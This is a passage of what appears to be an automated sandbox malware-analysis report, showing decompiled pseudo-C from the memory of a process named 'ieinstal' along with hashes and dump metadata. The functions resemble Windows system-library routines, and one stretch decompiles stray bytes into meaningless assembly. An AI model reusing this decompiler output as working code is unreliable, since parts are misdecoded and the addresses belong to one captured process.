                        															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                        															__edi = __edi + __eax * 2;
                        															__edi = __edi + 2;
                        															 *(__edi - 2) = __si;
                        															__ebx =  *__ebx;
                        															__eflags = __ebx - 0x1edf575c;
                        														} while (__ebx != 0x1edf575c);
                        														__esi = _v52;
                        														__ecx = _v16;
                        														__edx = _v32;
                        													}
                        													__ebx = _v56;
                        													goto L29;
                        												case 7:
                        													 *0x1edf8478 & 0x0000ffff = E1ED4F3E0(__edi,  *0x1edf847c,  *0x1edf8478 & 0x0000ffff);
                        													__eax =  *0x1edf8478 & 0x0000ffff;
                        													__eax = ( *0x1edf8478 & 0x0000ffff) >> 1;
                        													__eflags = _a8;
                        													__edi = __edi + __eax * 2;
                        													if(_a8 != 0) {
                        														__ecx = __edi;
                        														__eax = E1ED939F2(__ecx);
                        														__edi = __eax;
                        													}
                        													goto L28;
                        												case 8:
                        													__eax = 0;
                        													 *(__edi - 2) = __ax;
                        													 *0x1edf6e58 & 0x0000ffff = E1ED4F3E0(__edi,  *0x1edf6e5c,  *0x1edf6e58 & 0x0000ffff);
                        													 *(__esi + 0x38) = __edi;
                        													__eax =  *0x1edf6e58 & 0x0000ffff;
                        													__eax = ( *0x1edf6e58 & 0x0000ffff) >> 1;
                        													__edi = __edi + __eax * 2;
                        													__edi = __edi + 2;
                        													L28:
                        													_t291 = _v16;
                        													_t307 = _v32;
                        													L29:
                        													_t274 = _t274 + 4;
                        													__eflags = _t274;
                        													_v56 = _t274;
                        													goto L30;
                        											}
                        										}
                        									}
                        									goto L108;
                        									L30:
                        									_t291 = _t291 + 1;
                        									_v16 = _t291;
                        									__eflags = _t291 - _v48;
                        								} while (_t291 < _v48);
                        								goto L31;
                        							}
                        						}
                        					}
                        				} else {
                        					while(1) {
                        						L1:
                        						_t234 =  *(_v60 + _t319 * 4);
                        						if(_t234 > 8) {
                        							break;
                        						}
                        						switch( *((intOrPtr*)(_t234 * 4 +  &M1ED32935))) {
                        							case 0:
                        								__ax =  *0x1edf8488;
                        								__eflags = __ax;
                        								if(__ax != 0) {
                        									__eax = __ax & 0x0000ffff;
                        									__ebx = __ebx + 2;
                        									__eflags = __ebx;
                        									goto L53;
                        								}
                        								goto L14;
                        							case 1:
                        								L44:
                        								_t307 =  &_v64;
                        								_v80 = E1ED32E3E(0,  &_v64);
                        								_t274 = _t274 + _v64 + 2;
                        								goto L13;
                        							case 2:
                        								__eax =  *0x1edf8480 & 0x0000ffff;
                        								__ebx = __ebx + __eax;
                        								__eflags = __dl;
                        								if(__dl != 0) {
                        									__eax = 0x1edf8480;
                        									goto L80;
                        								}
                        								goto L14;
                        							case 3:
                        								__eax = E1ED1EEF0(0x1edf79a0);
                        								__eax =  &_v44;
                        								_push(__eax);
                        								_push(0);
                        								_push(0);
                        								_push(4);
                        								_push(L"PATH");
                        								_push(0);
                        								L57();
                        								__esi = __eax;
                        								_v68 = __esi;
                        								__eflags = __esi - 0xc0000023;
                        								if(__esi != 0xc0000023) {
                        									L10:
                        									__eax = E1ED1EB70(__ecx, 0x1edf79a0);
                        									__eflags = __esi - 0xc0000100;
                        									if(__esi == 0xc0000100) {
                        										_v44 = _v44 & 0x00000000;
                        										__eax = 0;
                        										_v68 = 0;
                        										goto L13;
                        									} else {
                        										__eflags = __esi;
                        										if(__esi < 0) {
                        											L32:
                        											_t208 = _v72;
                        											__eflags = _t208;
                        											if(_t208 != 0) {
                        												L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
                        											}
                        											_t209 = _v52;
                        											__eflags = _t209;
                        											if(_t209 != 0) {
                        												__eflags = _t327;
                        												if(_t327 < 0) {
                        													L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
                        													_t209 = 0;
                        												}
                        											}
                        											goto L36;
                        										} else {
                        											__eax = _v44;
                        											__ebx = __ebx + __eax * 2;
                        											__ebx = __ebx + 2;
                        											__eflags = __ebx;
                        											L13:
                        											_t287 = _v36;
                        											goto L14;
                        										}
                        									}
                        								} else {
                        									__eax = _v44;
                        									__ecx =  *0x1edf7b9c; // 0x0
                        									_v44 + _v44 =  *[fs:0x30];
                        									__ecx = __ecx + 0x180000;
                        									__eax = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                        									_v72 = __eax;
                        									__eflags = __eax;
                        									if(__eax == 0) {
                        										__eax = E1ED1EB70(__ecx, 0x1edf79a0);
                        										__eax = _v52;
                        										L36:
                        										_pop(_t320);
                        										_pop(_t328);
                        										__eflags = _v8 ^ _t333;
                        										_pop(_t275);
                        										return E1ED4B640(_t209, _t275, _v8 ^ _t333, _t307, _t320, _t328);
                        									} else {
                        										__ecx =  &_v44;
                        										_push(__ecx);
                        										_push(_v44);
                        										_push(__eax);
                        										_push(4);
                        										_push(L"PATH");
                        										_push(0);
                        										L57();
                        										__esi = __eax;
                        										_v68 = __eax;
                        										goto L10;
                        									}
                        								}
                        								goto L108;
                        							case 4:
                        								__ebx = __ebx + 4;
                        								goto L14;
                        							case 5:
                        								_t270 = _v56;
                        								if(_v56 != 0) {
                        									_t307 =  &_v36;
                        									_t272 = E1ED32E3E(_t270,  &_v36);
                        									_t287 = _v36;
                        									_v76 = _t272;
                        								}
                        								if(_t287 == 0) {
                        									goto L44;
                        								} else {
                        									_t274 = _t274 + 2 + _t287;
                        								}
                        								goto L14;
                        							case 6:
                        								__eax =  *0x1edf5764 & 0x0000ffff;
                        								goto L53;
                        							case 7:
                        								__eax =  *0x1edf8478 & 0x0000ffff;
                        								__ebx = __ebx + __eax;
                        								__eflags = _a8;
                        								if(_a8 != 0) {
                        									__ebx = __ebx + 0x16;
                        									__ebx = __ebx + __eax;
                        								}
                        								__eflags = __dl;
                        								if(__dl != 0) {
                        									__eax = 0x1edf8478;
                        									L80:
                        									_v32 = __eax;
                        								}
                        								goto L14;
                        							case 8:
                        								__eax =  *0x1edf6e58 & 0x0000ffff;
                        								__eax = ( *0x1edf6e58 & 0x0000ffff) + 2;
                        								L53:
                        								__ebx = __ebx + __eax;
                        								L14:
                        								_t319 = _t319 + 1;
                        								if(_t319 >= _v48) {
                        									goto L16;
                        								} else {
                        									_t307 = _v37;
                        									goto L1;
                        								}
                        								goto L108;
                        						}
                        					}
                        					L56:
                        					_push(0x25);
                        					asm("int 0x29");
                        					asm("out 0x28, al");
                        					asm("rcr dword [esi], cl");
                        					asm("o16 sub bl, dl");
                        					_push(ds);
                        					asm("loopne 0x29");
                        					asm("rcr dword [esi], cl");
                        					asm("rcr dword [es:esi], cl");
                        					_t279 = ds;
                        					asm("xlatb");
                        					_push(ds);
                        					_t339 = _t234 + 0x1f1ed326;
                        					_push(ds);
                        					_t237 = _t337 ^ 0x021ed75b;
                        					_push(ds);
                        					 *_t237 =  *_t237 - 0xd3;
                        					_push(ds);
                        					asm("rcr dword [esi], cl");
                        					_push(ds);
                        					_push(ds);
                        					_t330 = _t326 + 1 - 1;
                        					_t283 = _t279 - _t307 - _t307 - (_t237 *  *_t321 >> 0x20) - (_t237 *  *_t321 >> 0x20);
                        					_push(ds);
                        					asm("daa");
                        					asm("rcr dword [esi], cl");
                        					asm("fcomp dword [ebx-0x29]");
                        					_push(ds);
                        					asm("rcr dword [esi], cl");
                        					asm("xlatb");
                        					_push(ds);
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					_push(0x20);
                        					_push(0x1eddff00);
                        					E1ED5D08C(_t283, _t321, _t330);
                        					_v44 =  *[fs:0x18];
                        					_t322 = 0;
                        					 *_a24 = 0;
                        					_t284 = _a12;
                        					__eflags = _t284;
                        					if(_t284 == 0) {
                        						_t243 = 0xc0000100;
                        					} else {
                        						_v8 = 0;
                        						_t331 = 0xc0000100;
                        						_v52 = 0xc0000100;
                        						_t245 = 4;
                        						while(1) {
                        							_v40 = _t245;
                        							__eflags = _t245;
                        							if(_t245 == 0) {
                        								break;
                        							}
                        							_t297 = _t245 * 0xc;
                        							_v48 = _t297;
                        							__eflags = _t284 -  *((intOrPtr*)(_t297 + 0x1ece1664));
                        							if(__eflags <= 0) {
                        								if(__eflags == 0) {
                        									_t260 = E1ED4E5C0(_a8,  *((intOrPtr*)(_t297 + 0x1ece1668)), _t284);
                        									_t339 = _t339 + 0xc;
                        									__eflags = _t260;
                        									if(__eflags == 0) {
                        										_t331 = E1ED851BE(_t284,  *((intOrPtr*)(_v48 + 0x1ece166c)), _a16, _t322, _t331, __eflags, _a20, _a24);
                        										_v52 = _t331;
                        										break;
                        									} else {
                        										_t245 = _v40;
                        										goto L62;
                        									}
                        									goto L70;
                        								} else {
                        									L62:
                        									_t245 = _t245 - 1;
                        									continue;
                        								}
                        							}
                        							break;
                        						}
                        						_v32 = _t331;
                        						__eflags = _t331;
                        						if(_t331 < 0) {
                        							__eflags = _t331 - 0xc0000100;
                        							if(_t331 == 0xc0000100) {
                        								_t293 = _a4;
                        								__eflags = _t293;
                        								if(_t293 != 0) {
                        									_v36 = _t293;
                        									__eflags =  *_t293 - _t322;
                        									if( *_t293 == _t322) {
                        										_t331 = 0xc0000100;
                        										goto L76;
                        									} else {
                        										_t310 =  *((intOrPtr*)(_v44 + 0x30));
                        										_t247 =  *((intOrPtr*)(_t310 + 0x10));
                        										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t293;
                        										if( *((intOrPtr*)(_t247 + 0x48)) == _t293) {
                        											__eflags =  *(_t310 + 0x1c);
                        											if( *(_t310 + 0x1c) == 0) {
                        												L106:
                        												_t331 = E1ED32AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
                        												_v32 = _t331;
                        												__eflags = _t331 - 0xc0000100;
                        												if(_t331 != 0xc0000100) {
                        													goto L69;
                        												} else {
                        													_t322 = 1;
                        													_t293 = _v36;
                        													goto L75;
                        												}
                        											} else {
                        												_t250 = E1ED16600( *(_t310 + 0x1c));
                        												__eflags = _t250;
                        												if(_t250 != 0) {
                        													goto L106;
                        												} else {
                        													_t293 = _a4;
                        													goto L75;
                        												}
                        											}
                        										} else {
                        											L75:
                        											_t331 = E1ED32C50(_t293, _a8, _t284, _a16, _a20, _a24, _t322);
                        											L76:
                        											_v32 = _t331;
                        											goto L69;
                        										}
                        									}
                        									goto L108;
                        								} else {
                        									E1ED1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        									_v8 = 1;
                        									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                        									_t331 = _a24;
                        									_t257 = E1ED32AE4( &_v36, _a8, _t284, _a16, _a20, _t331);
                        									_v32 = _t257;
                        									__eflags = _t257 - 0xc0000100;
                        									if(_t257 == 0xc0000100) {
                        										_v32 = E1ED32C50(_v36, _a8, _t284, _a16, _a20, _t331, 1);
                        									}
                        									_v8 = _t322;
                        									E1ED32ACB();
                        								}
                        							}
                        						}
                        						L69:
                        						_v8 = 0xfffffffe;
                        						_t243 = _t331;
                        					}
                        					L70:
                        					return E1ED5D0D1(_t243);
                        				}
                        				L108:
                        			}


                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: PATH
                        • API String ID: 0-1036084923
                        • Opcode ID: d323745cbe40ff88f96882c185c16c2c4e9ae98893e3e621cea0e0f7feaec233
                        • Instruction ID: f29a48a5355a38c0fb5bcb3dd84ceb469e10d4562736071692bae06ed76a018b
                        • Opcode Fuzzy Hash: d323745cbe40ff88f96882c185c16c2c4e9ae98893e3e621cea0e0f7feaec233
                        • Instruction Fuzzy Hash: 95C1A0F5D00259DFCB14CF99C891BEDB7B2FF48B01F654629E841AB290D734A942CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E1ED3FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                        				char _v5;
                        				signed int _v8;
                        				signed int _v12;
                        				char _v16;
                        				char _v17;
                        				char _v20;
                        				signed int _v24;
                        				char _v28;
                        				char _v32;
                        				signed int _v40;
                        				void* __ecx;
                        				void* __edi;
                        				void* __ebp;
                        				signed int _t73;
                        				intOrPtr* _t75;
                        				signed int _t77;
                        				signed int _t79;
                        				signed int _t81;
                        				intOrPtr _t83;
                        				intOrPtr _t85;
                        				intOrPtr _t86;
                        				signed int _t91;
                        				signed int _t94;
                        				signed int _t95;
                        				signed int _t96;
                        				signed int _t106;
                        				signed int _t108;
                        				signed int _t114;
                        				signed int _t116;
                        				signed int _t118;
                        				signed int _t122;
                        				signed int _t123;
                        				void* _t129;
                        				signed int _t130;
                        				void* _t132;
                        				intOrPtr* _t134;
                        				signed int _t138;
                        				signed int _t141;
                        				signed int _t147;
                        				intOrPtr _t153;
                        				signed int _t154;
                        				signed int _t155;
                        				signed int _t170;
                        				void* _t174;
                        				signed int _t176;
                        				signed int _t177;
                        
                        				_t129 = __ebx;
                        				_push(_t132);
                        				_push(__esi);
                        				_t174 = _t132;
                        				_t73 =  !( *( *(_t174 + 0x18)));
                        				if(_t73 >= 0) {
                        					L5:
                        					return _t73;
                        				} else {
                        					E1ED1EEF0(0x1edf7b60);
                        					_t134 =  *0x1edf7b84; // 0x77f07b80
                        					_t2 = _t174 + 0x24; // 0x24
                        					_t75 = _t2;
                        					if( *_t134 != 0x1edf7b80) {
                        						_push(3);
                        						asm("int 0x29");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						_push(0x1edf7b60);
                        						_t170 = _v8;
                        						_v28 = 0;
                        						_v40 = 0;
                        						_v24 = 0;
                        						_v17 = 0;
                        						_v32 = 0;
                        						__eflags = _t170 & 0xffff7cf2;
                        						if((_t170 & 0xffff7cf2) != 0) {
                        							L43:
                        							_t77 = 0xc000000d;
                        						} else {
                        							_t79 = _t170 & 0x0000000c;
                        							__eflags = _t79;
                        							if(_t79 != 0) {
                        								__eflags = _t79 - 0xc;
                        								if(_t79 == 0xc) {
                        									goto L43;
                        								} else {
                        									goto L9;
                        								}
                        							} else {
                        								_t170 = _t170 | 0x00000008;
                        								__eflags = _t170;
                        								L9:
                        								_t81 = _t170 & 0x00000300;
                        								__eflags = _t81 - 0x300;
                        								if(_t81 == 0x300) {
                        									goto L43;
                        								} else {
                        									_t138 = _t170 & 0x00000001;
                        									__eflags = _t138;
                        									_v24 = _t138;
                        									if(_t138 != 0) {
                        										__eflags = _t81;
                        										if(_t81 != 0) {
                        											goto L43;
                        										} else {
                        											goto L11;
                        										}
                        									} else {
                        										L11:
                        										_push(_t129);
                        										_t77 = E1ED16D90( &_v20);
                        										_t130 = _t77;
                        										__eflags = _t130;
                        										if(_t130 >= 0) {
                        											_push(_t174);
                        											__eflags = _t170 & 0x00000301;
                        											if((_t170 & 0x00000301) == 0) {
                        												_t176 = _a8;
                        												__eflags = _t176;
                        												if(__eflags == 0) {
                        													L64:
                        													_t83 =  *[fs:0x18];
                        													_t177 = 0;
                        													__eflags =  *(_t83 + 0xfb8);
                        													if( *(_t83 + 0xfb8) != 0) {
                        														E1ED176E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                        														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                        													}
                        													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                        													goto L15;
                        												} else {
                        													asm("sbb edx, edx");
                        													_t114 = E1EDA8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                        													__eflags = _t114;
                        													if(_t114 < 0) {
                        														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                        														E1ED0B150();
                        													}
                        													_t116 = E1EDA6D81(_t176,  &_v16);
                        													__eflags = _t116;
                        													if(_t116 >= 0) {
                        														__eflags = _v16 - 2;
                        														if(_v16 < 2) {
                        															L56:
                        															_t118 = E1ED175CE(_v20, 5, 0);
                        															__eflags = _t118;
                        															if(_t118 < 0) {
                        																L67:
                        																_t130 = 0xc0000017;
                        																goto L32;
                        															} else {
                        																__eflags = _v12;
                        																if(_v12 == 0) {
                        																	goto L67;
                        																} else {
                        																	_t153 =  *0x1edf8638; // 0x2fc1388
                        																	_t122 = L1ED138A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                        																	_t154 = _v12;
                        																	_t130 = _t122;
                        																	__eflags = _t130;
                        																	if(_t130 >= 0) {
                        																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                        																		__eflags = _t123;
                        																		if(_t123 != 0) {
                        																			_t155 = _a12;
                        																			__eflags = _t155;
                        																			if(_t155 != 0) {
                        																				 *_t155 = _t123;
                        																			}
                        																			goto L64;
                        																		} else {
                        																			E1ED176E2(_t154);
                        																			goto L41;
                        																		}
                        																	} else {
                        																		E1ED176E2(_t154);
                        																		_t177 = 0;
                        																		goto L18;
                        																	}
                        																}
                        															}
                        														} else {
                        															__eflags =  *_t176;
                        															if( *_t176 != 0) {
                        																goto L56;
                        															} else {
                        																__eflags =  *(_t176 + 2);
                        																if( *(_t176 + 2) == 0) {
                        																	goto L64;
                        																} else {
                        																	goto L56;
                        																}
                        															}
                        														}
                        													} else {
                        														_t130 = 0xc000000d;
                        														goto L32;
                        													}
                        												}
                        												goto L35;
                        											} else {
                        												__eflags = _a8;
                        												if(_a8 != 0) {
                        													_t77 = 0xc000000d;
                        												} else {
                        													_v5 = 1;
                        													L1ED3FCE3(_v20, _t170);
                        													_t177 = 0;
                        													__eflags = 0;
                        													L15:
                        													_t85 =  *[fs:0x18];
                        													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                        													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                        														L18:
                        														__eflags = _t130;
                        														if(_t130 != 0) {
                        															goto L32;
                        														} else {
                        															__eflags = _v5 - _t130;
                        															if(_v5 == _t130) {
                        																goto L32;
                        															} else {
                        																_t86 =  *[fs:0x18];
                        																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                        																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                        																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                        																}
                        																__eflags = _t177;
                        																if(_t177 == 0) {
                        																	L31:
                        																	__eflags = 0;
                        																	L1ED170F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                        																	goto L32;
                        																} else {
                        																	__eflags = _v24;
                        																	_t91 =  *(_t177 + 0x20);
                        																	if(_v24 != 0) {
                        																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                        																		goto L31;
                        																	} else {
                        																		_t141 = _t91 & 0x00000040;
                        																		__eflags = _t170 & 0x00000100;
                        																		if((_t170 & 0x00000100) == 0) {
                        																			__eflags = _t141;
                        																			if(_t141 == 0) {
                        																				L74:
                        																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                        																				goto L27;
                        																			} else {
                        																				_t177 = E1ED3FD22(_t177);
                        																				__eflags = _t177;
                        																				if(_t177 == 0) {
                        																					goto L42;
                        																				} else {
                        																					_t130 = E1ED3FD9B(_t177, 0, 4);
                        																					__eflags = _t130;
                        																					if(_t130 != 0) {
                        																						goto L42;
                        																					} else {
                        																						_t68 = _t177 + 0x20;
                        																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                        																						__eflags =  *_t68;
                        																						_t91 =  *(_t177 + 0x20);
                        																						goto L74;
                        																					}
                        																				}
                        																			}
                        																			goto L35;
                        																		} else {
                        																			__eflags = _t141;
                        																			if(_t141 != 0) {
                        																				_t177 = E1ED3FD22(_t177);
                        																				__eflags = _t177;
                        																				if(_t177 == 0) {
                        																					L42:
                        																					_t77 = 0xc0000001;
                        																					goto L33;
                        																				} else {
                        																					_t130 = E1ED3FD9B(_t177, 0, 4);
                        																					__eflags = _t130;
                        																					if(_t130 != 0) {
                        																						goto L42;
                        																					} else {
                        																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                        																						_t91 =  *(_t177 + 0x20);
                        																						goto L26;
                        																					}
                        																				}
                        																				goto L35;
                        																			} else {
                        																				L26:
                        																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                        																				__eflags = _t94;
                        																				L27:
                        																				 *(_t177 + 0x20) = _t94;
                        																				__eflags = _t170 & 0x00008000;
                        																				if((_t170 & 0x00008000) != 0) {
                        																					_t95 = _a12;
                        																					__eflags = _t95;
                        																					if(_t95 != 0) {
                        																						_t96 =  *_t95;
                        																						__eflags = _t96;
                        																						if(_t96 != 0) {
                        																							 *((short*)(_t177 + 0x22)) = 0;
                        																							_t40 = _t177 + 0x20;
                        																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                        																							__eflags =  *_t40;
                        																						}
                        																					}
                        																				}
                        																				goto L31;
                        																			}
                        																		}
                        																	}
                        																}
                        															}
                        														}
                        													} else {
                        														_t147 =  *( *[fs:0x18] + 0xfc0);
                        														_t106 =  *(_t147 + 0x20);
                        														__eflags = _t106 & 0x00000040;
                        														if((_t106 & 0x00000040) != 0) {
                        															_t147 = E1ED3FD22(_t147);
                        															__eflags = _t147;
                        															if(_t147 == 0) {
                        																L41:
                        																_t130 = 0xc0000001;
                        																L32:
                        																_t77 = _t130;
                        																goto L33;
                        															} else {
                        																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                        																_t106 =  *(_t147 + 0x20);
                        																goto L17;
                        															}
                        															goto L35;
                        														} else {
                        															L17:
                        															_t108 = _t106 | 0x00000080;
                        															__eflags = _t108;
                        															 *(_t147 + 0x20) = _t108;
                        															 *( *[fs:0x18] + 0xfc0) = _t147;
                        															goto L18;
                        														}
                        													}
                        												}
                        											}
                        											L33:
                        										}
                        									}
                        								}
                        							}
                        						}
                        						L35:
                        						return _t77;
                        					} else {
                        						 *_t75 = 0x1edf7b80;
                        						 *((intOrPtr*)(_t75 + 4)) = _t134;
                        						 *_t134 = _t75;
                        						 *0x1edf7b84 = _t75;
                        						_t73 = E1ED1EB70(_t134, 0x1edf7b60);
                        						if( *0x1edf7b20 != 0) {
                        							_t73 =  *( *[fs:0x30] + 0xc);
                        							if( *((char*)(_t73 + 0x28)) == 0) {
                        								_t73 = E1ED1FF60( *0x1edf7b20);
                        							}
                        						}
                        						goto L5;
                        					}
                        				}
                        			}

                        Strings
                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 1ED7BE0F
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                        • API String ID: 0-865735534
                        • Opcode ID: 41f1d3bb86ee8b4771acbacc3dd6c8a5f144994f20da69a6bcc1fbe6639c3475
                        • Instruction ID: d11c347fcc40906e8dca007076d897472528cb5da9ff0f0ef547201f507d87a3
                        • Opcode Fuzzy Hash: 41f1d3bb86ee8b4771acbacc3dd6c8a5f144994f20da69a6bcc1fbe6639c3475
                        • Instruction Fuzzy Hash: D2A108B5E0064A8FD711CF65C490BEEB3A6AF44715F114BAAE986DB780DB31D881CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 63%
                        			E1ED02D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                        				signed char _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				signed int _v52;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t55;
                        				signed int _t57;
                        				signed int _t58;
                        				char* _t62;
                        				signed char* _t63;
                        				signed char* _t64;
                        				signed int _t67;
                        				signed int _t72;
                        				signed int _t77;
                        				signed int _t78;
                        				signed int _t88;
                        				intOrPtr _t89;
                        				signed char _t93;
                        				signed int _t97;
                        				signed int _t98;
                        				signed int _t102;
                        				signed int _t103;
                        				intOrPtr _t104;
                        				signed int _t105;
                        				signed int _t106;
                        				signed char _t109;
                        				signed int _t111;
                        				void* _t116;
                        
                        				_t102 = __edi;
                        				_t97 = __edx;
                        				_v12 = _v12 & 0x00000000;
                        				_t55 =  *[fs:0x18];
                        				_t109 = __ecx;
                        				_v8 = __edx;
                        				_t86 = 0;
                        				_v32 = _t55;
                        				_v24 = 0;
                        				_push(__edi);
                        				if(__ecx == 0x1edf5350) {
                        					_t86 = 1;
                        					_v24 = 1;
                        					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                        				}
                        				_t103 = _t102 | 0xffffffff;
                        				if( *0x1edf7bc8 != 0) {
                        					_push(0xc000004b);
                        					_push(_t103);
                        					E1ED497C0();
                        				}
                        				if( *0x1edf79c4 != 0) {
                        					_t57 = 0;
                        				} else {
                        					_t57 = 0x1edf79c8;
                        				}
                        				_v16 = _t57;
                        				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                        					_t93 = _t109;
                        					L23();
                        				}
                        				_t58 =  *_t109;
                        				if(_t58 == _t103) {
                        					__eflags =  *(_t109 + 0x14) & 0x01000000;
                        					_t58 = _t103;
                        					if(__eflags == 0) {
                        						_t93 = _t109;
                        						E1ED31624(_t86, __eflags);
                        						_t58 =  *_t109;
                        					}
                        				}
                        				_v20 = _v20 & 0x00000000;
                        				if(_t58 != _t103) {
                        					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                        				}
                        				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                        				_t88 = _v16;
                        				_v28 = _t104;
                        				L9:
                        				while(1) {
                        					if(E1ED27D50() != 0) {
                        						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                        					} else {
                        						_t62 = 0x7ffe0382;
                        					}
                        					if( *_t62 != 0) {
                        						_t63 =  *[fs:0x30];
                        						__eflags = _t63[0x240] & 0x00000002;
                        						if((_t63[0x240] & 0x00000002) != 0) {
                        							_t93 = _t109;
                        							E1ED9FE87(_t93);
                        						}
                        					}
                        					if(_t104 != 0xffffffff) {
                        						_push(_t88);
                        						_push(0);
                        						_push(_t104);
                        						_t64 = E1ED49520();
                        						goto L15;
                        					} else {
                        						while(1) {
                        							_t97 =  &_v8;
                        							_t64 = E1ED3E18B(_t109 + 4, _t97, 4, _t88, 0);
                        							if(_t64 == 0x102) {
                        								break;
                        							}
                        							_t93 =  *(_t109 + 4);
                        							_v8 = _t93;
                        							if((_t93 & 0x00000002) != 0) {
                        								continue;
                        							}
                        							L15:
                        							if(_t64 == 0x102) {
                        								break;
                        							}
                        							_t89 = _v24;
                        							if(_t64 < 0) {
                        								L1ED5DF30(_t93, _t97, _t64);
                        								_push(_t93);
                        								_t98 = _t97 | 0xffffffff;
                        								__eflags =  *0x1edf6901;
                        								_push(_t109);
                        								_v52 = _t98;
                        								if( *0x1edf6901 != 0) {
                        									_push(0);
                        									_push(1);
                        									_push(0);
                        									_push(0x100003);
                        									_push( &_v12);
                        									_t72 = E1ED49980();
                        									__eflags = _t72;
                        									if(_t72 < 0) {
                        										_v12 = _t98 | 0xffffffff;
                        									}
                        								}
                        								asm("lock cmpxchg [ecx], edx");
                        								_t111 = 0;
                        								__eflags = 0;
                        								if(0 != 0) {
                        									__eflags = _v12 - 0xffffffff;
                        									if(_v12 != 0xffffffff) {
                        										_push(_v12);
                        										E1ED495D0();
                        									}
                        								} else {
                        									_t111 = _v12;
                        								}
                        								return _t111;
                        							} else {
                        								if(_t89 != 0) {
                        									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                        									_t77 = E1ED27D50();
                        									__eflags = _t77;
                        									if(_t77 == 0) {
                        										_t64 = 0x7ffe0384;
                        									} else {
                        										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                        									}
                        									__eflags =  *_t64;
                        									if( *_t64 != 0) {
                        										_t64 =  *[fs:0x30];
                        										__eflags = _t64[0x240] & 0x00000004;
                        										if((_t64[0x240] & 0x00000004) != 0) {
                        											_t78 = E1ED27D50();
                        											__eflags = _t78;
                        											if(_t78 == 0) {
                        												_t64 = 0x7ffe0385;
                        											} else {
                        												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                        											}
                        											__eflags =  *_t64 & 0x00000020;
                        											if(( *_t64 & 0x00000020) != 0) {
